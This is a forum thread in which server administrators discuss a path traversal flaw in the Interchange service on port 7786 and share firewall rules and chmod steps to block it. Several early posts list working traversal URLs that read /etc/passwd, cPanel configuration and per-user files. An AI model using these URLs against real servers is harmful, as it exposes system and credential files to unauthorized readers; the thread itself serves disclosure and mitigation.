Am I cracking up or.....

[Stormtrooper]

Ok redhat users, try this one on your server:

http://YOURSERVER.COM:7786/../../../../../../../../../etc/passwd

let me know if you see anything strange....

 

[feanor]

confirmed- gaping hole in Interchange.

AAAAAAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

researching now.

 

[itf]

It is not necessary to use 9 times &../& after 7786/ ; 6 times are enough

http://domain.com:7786/../../../../../../etc/passwd
http://domain.com:7786/../../../../../../etc/group
http://domain.com:7786/../../../../../../etc/named.conf
http://domain.com:7786/../../../../../../root/anaconda-ks.cfg
http://domain.com:7786/../../../../../../usr/local/cpanel/etc/cpanel.config

change username with usernames in /etc/passwd
http://domain.com:7786/../../../../../../var/cpanel/users/username


it seems it is not necessary to waste time for SSH connection !!!
http://domain.com:7786/../../../../../../etc/httpd/conf/httpd.conf
http://domain.com:7786/../../../../../../etc/proftpd.conf
http://domain.com:7786/../../../../../../etc/hosts


in brief everything in a server.

Damn hole


I stopped Interchange on our critical servers

 

[Stormtrooper]

/*fix removed*/


CPANEL is too &smart&....if 'un'chmod's the file...if we get something I'll be happy to share it

 

[feanor]

I submitted a bug to redhat regarding this, using one of their boxes as an example....
hopefully that means they will take action soon.
:p

If any one has a fix for this that allows IC to stay running, please share... we are working one internally at this time.

:p

 

[itf]

To Stop the Interchange, use these commands in a Root SSH session
[b:9d67360414]
/etc/rc.d/init.d/cpanel3 stop

chmod 600 /usr/local/cpanel/bin/startinterchange

/etc/rc.d/init.d/cpanel3 start [/b:9d67360414]

 

[Stormtrooper]

now, like the &kill interchange& thing I posted...does cpanel find the improper permissions and &fix& it for you in 10 minutes? the only difference between what you posted and what I posted was that I screwed up and posted a 500 instead of 600 permission

 

[itf]

[quote:b55e7e62f4][i:b55e7e62f4]Originally posted by Stormtrooper[/i:b55e7e62f4]

now, like the &kill interchange& thing I posted...does cpanel find the improper permissions and &fix& it for you in 10 minutes? the only difference between what you posted and what I posted was that I screwed up and posted a 500 instead of 600 permission[/quote:b55e7e62f4]
chmod 500 leaves it executable for Root and cpanel can run it, use chmod 600 it will not run until the next cpanel upgrade

 

[feanor]

just disable interchange in &service manager& via WHManager- it's much, much less painful.

hopefully we have a patch soon.
REDHAT bestow your mighty skillz upon us!

 

[bdraco]

/sbin/ipchains -A input -s 127.0.0.1 -d 127.0.0.1 7786 -p tcp -y -j ACCEPT
/sbin/ipchains -A input -s 0/0 -d 0/0 7786 -p tcp -y -j DENY


Running the above should allow interchange to continue to function and prevent people from remotly taking advantage of this hole.

 

[bert]

Thanks Nick. It worked :p

 

[techark]

Nick ?

Why am I getting protocol not avaliable when I run those commands?

 

[techid]

I also am getting the same thing...

root@capital ]# /sbin/ipchains -A input -s 127.0.0.1 -d 127.0.0.1 7786 -p tcp -y -j ACCEPT
ipchains: Protocol not available

 

[joana]

ipchains: Protocol not available

 

[MarlboroMan]

Possibly you have to use IPTables instead of IPChains?

/sbin/iptables -A INPUT -p tcp -s 127.0.0.1 -d 127.0.0.1 --destination-port 7786 -j ACCEPT
/sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j DENY

(correct me if the statements are wrong, that's been known to happen)

 

[bdraco]

Right .. your machine might have iptables instead of ipchains.

If it still doesn't work
try

modprobe ipchains first

If still not, then you need to recompile your kernel with ipchains or iptables support.

 

[joana]

[quote:e7b757c7f8][i:e7b757c7f8]Originally posted by MarlboroMan[/i:e7b757c7f8]

Possibly you have to use IPTables instead of IPChains?

/sbin/iptables -A INPUT -p tcp -s 127.0.0.1 -d 127.0.0.1 --destination-port 7786 -j ACCEPT
/sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j DENY

(correct me if the statements are wrong, that's been known to happen)[/quote:e7b757c7f8]

root@xxxxxx [~]# /sbin/iptables -A INPUT -p tcp -s 127.0.0.1 -d 127.0.0.1 --destination-port 7786 -j ACCEPT

root@xxxxxx [~]# /sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j DENY

iptables v1.2.4: Couldn't load target `DENY':/lib/iptables/libipt_DENY.so: cannot open shared object file: No such file or directory

Try `iptables -h' or 'iptables --help' for more information.

 

[Annette]

Try this instead:

/sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j REJECT

iptables uses REJECT as the default instead of DENY.

 

[joana]

[quote:ae47852901][i:ae47852901]Originally posted by Annette[/i:ae47852901]

Try this instead:

/sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j REJECT

iptables uses REJECT as the default instead of DENY.[/quote:ae47852901]

It worked..Thanks

 

[MarlboroMan]

Another note....

If you reboot your machine, these firewall rules get flushed.

You might want to put those two commands in one of your init scripts until Interchange releases a permanent fix.